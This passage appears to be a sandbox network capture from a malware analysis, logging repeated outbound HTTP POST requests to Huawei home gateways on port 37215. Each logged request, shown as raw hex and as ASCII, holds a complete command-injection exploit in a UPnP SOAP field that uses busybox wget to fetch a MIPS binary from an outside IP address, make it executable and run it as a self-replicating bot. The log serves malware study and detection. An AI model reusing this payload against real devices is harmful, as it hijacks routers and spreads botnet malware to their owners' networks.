62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  229192.168.2.1338640157.71.166.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078052044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  230192.168.2.1344444157.236.255.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078063011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  231192.168.2.134261061.172.8.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078069925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  232192.168.2.134374466.163.114.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078090906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  233192.168.2.1338216197.237.162.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078139067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  234192.168.2.1340700157.217.148.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078151941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  235192.168.2.1355192197.222.232.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078151941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  236192.168.2.1343086157.234.195.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078151941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  237192.168.2.134831089.108.55.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078171968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  238192.168.2.134860841.229.60.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078196049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  239192.168.2.134341241.159.244.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078200102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
